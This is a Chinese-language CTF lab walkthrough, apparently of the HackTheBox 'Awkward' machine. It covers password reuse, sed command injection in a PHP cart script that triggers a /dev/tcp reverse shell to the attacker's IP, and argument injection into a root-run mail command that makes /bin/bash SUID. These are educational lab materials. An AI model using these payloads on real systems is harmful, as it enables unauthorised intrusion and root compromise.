┌──(root㉿kali)-[~/Desktop]
└─# ssh bean@10.10.11.185                      
The authenticity of host '10.10.11.185 (10.10.11.185)' can't be established.
ED25519 key fingerprint is SHA256:iXn1BLzsoL4oHP9bO/v5F/CKp7pdoku6nopTeJlvR3U.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.11.185' (ED25519) to the list of known hosts.
bean@10.10.11.185's password: 
Welcome to Ubuntu 22.04.1 LTS (GNU/Linux 5.15.0-52-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

0 updates can be applied immediately.


The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings

Last login: Sun Mar 12 01:59:31 2023 from 10.10.14.68
bean@awkward:~$ whoami&&id
bean
uid=1001(bean) gid=1001(bean) groups=1001(bean)

成功登录到 user 用户

bean@awkward:~$ cat user.txt 
5005243124dea7c1f14fc7d933ef2946

成功拿到 user 用户的 flag 文件

权限提升

还记得我们的子域名 store 吗?

在 burp 中的时候显示该页面来自 nginx 服务器,让我们看一下 shell 中的 nginx 配置文件

bean@awkward:~$ cd /etc/nginx/conf.d/
bean@awkward:/etc/nginx/conf.d$ ls -la
total 12
drwxr-xr-x 2 root root 4096 Sep 15 22:34 .
drwxr-xr-x 8 root root 4096 Oct  6 00:49 ..
-rw-r--r-- 1 root root   44 Sep 15 22:34 .htpasswd
bean@awkward:/etc/nginx/conf.d$ cat .htpasswd 
admin:$apr1$lfvrwhqi$hd49MbBX3WNluMezyjWls1

我们使用 john 去跑一下

┌──(root㉿kali)-[~/Desktop]
└─# john --wordlist=/usr/share/wordlists/rockyou.txt hash
Warning: detected hash type "md5crypt", but the string is also recognized as "md5crypt-long"
Use the "--format=md5crypt-long" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (md5crypt, crypt(3) $1$ (and variants) [MD5 128/128 AVX 4x3])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
0g 0:00:01:30 DONE (2023-03-12 01:34) 0g/s 156319p/s 156319c/s 156319C/s  ejngyhga007..*7¡Vamos!
Session completed.

然而并没有结果

然而我突然想起来 content-DS1ZS1 文件底部有一句注释

boldMAKE SURE TO USE THIS EVERYWHERE ^^^/bold 

大概意思就是让我们导出尝试一下

username = admin
password = 014mrbeanrules!#P

使用 bean 的代码前往 http://store.hat-valley.htb/ 登录 admin 账户成功

这很明显是 Hat Valley 的在线商店。我们去查看一下代码

bean@awkward:/var/www/store$ ls -la
total 104
drwxr-xr-x 9 root root  4096 Oct  6 01:35 .
drwxr-xr-x 7 root root  4096 Oct  6 01:35 ..
drwxrwxrwx 2 root root  4096 Mar 12 01:30 cart
-rwxr-xr-x 1 root root  3664 Sep 15 20:09 cart_actions.php
-rwxr-xr-x 1 root root 12140 Sep 15 20:09 cart.php
-rwxr-xr-x 1 root root  9143 Sep 15 20:09 checkout.php
drwxr-xr-x 2 root root  4096 Oct  6 01:35 css
drwxr-xr-x 2 root root  4096 Oct  6 01:35 fonts
drwxr-xr-x 6 root root  4096 Oct  6 01:35 img
-rwxr-xr-x 1 root root 14770 Sep 15 20:09 index.php
drwxr-xr-x 3 root root  4096 Oct  6 01:35 js
drwxrwxrwx 2 root root  4096 Mar 12 04:30 product-details
-rwxr-xr-x 1 root root   918 Sep 15 20:09 README.md
-rwxr-xr-x 1 root root 13731 Sep 15 20:09 shop.php
drwxr-xr-x 6 root root  4096 Oct  6 01:35 static
-rwxr-xr-x 1 root root   695 Sep 15 20:09 style.css
bean@awkward:/var/www/store$ cat README.md 
# Hat Valley - Shop Online!

### To Do
1. Waiting for SQL database to be setup, using offline files for now, will merge with database once it is setup
2. Implement checkout system, link with credit card system (Stripe??)
3. Implement shop filter
4. Get full catalogue of items

### How to Add New Catalogue Item
1. Copy an existing item from /product-details and paste it in the same folder, changing the name to reflect a new product ID
2. Change the fields to the appropriate values and save the file.  
-- NOTE: Please leave the header on first line! This is used to verify it as a valid Hat Valley product. --

### Hat Valley Cart
Right now, the user's cart is stored within /cart, and is named according to the user's session ID. All products are appended to the same file for each user.
To test cart functionality, create a new cart file and add items to it, and see how they are reflected on the store website!

README.md 告诉我们文件正离线存储在 /product-details 和 /cart 中

在文件 cart_actions.php 中的一段代码

    if(checkValidItem("{$STORE_HOME}cart/{$user_id}")) {
        system("sed -i '/item_id={$item_id}/d' {$STORE_HOME}cart/{$user_id}");
        echo "Item removed from cart";
    }
    else {
        echo "Invalid item";
    }
    exit;

这不就有了

这段中的 sed 命令是用于从购物车文件中删除数据

我们可以利用这个代码来进行远程代码执行

首先我们需要一个 Reverse Shell

echo "bash -i >& /dev/tcp/10.10.16.26/4444 0>&1" >> /tmp/shell.sh
chmod 777 /tmp/shell.sh

bean@awkward:/var/www/store/cart$ cat /tmp/shell.sh 
#!/bin/bash
bash -i >& /dev/tcp/10.10.16.26/4444 0>&1
nc -nvlp 4444

然后接着我们将产品添加到购物车

然后修改一下参数,加入下面的参数

1/'+-e+"1e+/tmp/shell.sh"+/tmp/shell.sh+'

然后我们需要修改在 /cart 中创建的文件,不幸的是我们没有操作权限,所以我们选择删除这个文件,然后自己创建一个

bean@awkward:/var/www/store/cart$ ls
b1b9-7006-2d9-74bc
bean@awkward:/var/www/store/cart$ cp b1b9-7006-2d9-74bc bak
bean@awkward:/var/www/store/cart$ rm -rf b1b9-7006-2d9-74bc 
bean@awkward:/var/www/store/cart$ cp bak b1b9-7006-2d9-74bc
bean@awkward:/var/www/store/cart$ vi b1b9-7006-2d9-74bc 
bean@awkward:/var/www/store/cart$ cat b1b9-7006-2d9-74bc 
***Hat Valley Cart***
item_id=1' -e "1e /tmp/shell.sh" /tmp/shell.sh '&item_name=Yellow Beanie&item_brand=Good Doggo&item_price=$39.90

然后我们抓一个删除商品的包

修改好以后执行

这边拿到的是 www-data 的权限

去执行一下 pspy

当有新的请假请求的时候,会调用 mail 命令拼接对应 csv 文件中的 name

2023/03/12 05:12:09 CMD: UID=0     PID=74503  | mail -s Leave Request: christopher.jones christine
www-data@awkward:/tmp$ cat exploit.sh
#!/bin/bash
chmod +s /bin/bash

www-data@awkward:/tmp$ chmod 777 exploit

www-data@awkward:/tmp$ cd /var/www/private

www-data@awkward:~/private$ echo '" --exec="\!/tmp/exploit.sh"' >> leave_requests.csv
<" --exec="\!/tmp/exploit.sh"' >> leave_requests.csv
www-data@awkward:~/private$ ls -la /bin/bash

ls -la /bin/bash
-rwsr-sr-x 1 root root 1396520 Jan  7  2022 /bin/bash
www-data@awkward:~/private$ /bin/bash -p
/bin/bash -p
whoami&&id
root
uid=33(www-data) gid=33(www-data) euid=0(root) egid=0(root) groups=0(root),33(www-data)

成功提权到 root 权限

cat /root/root.txt
5d3d649dfbaf5f418cdca5f79012eafa

成功拿到 root 权限的 flag 文件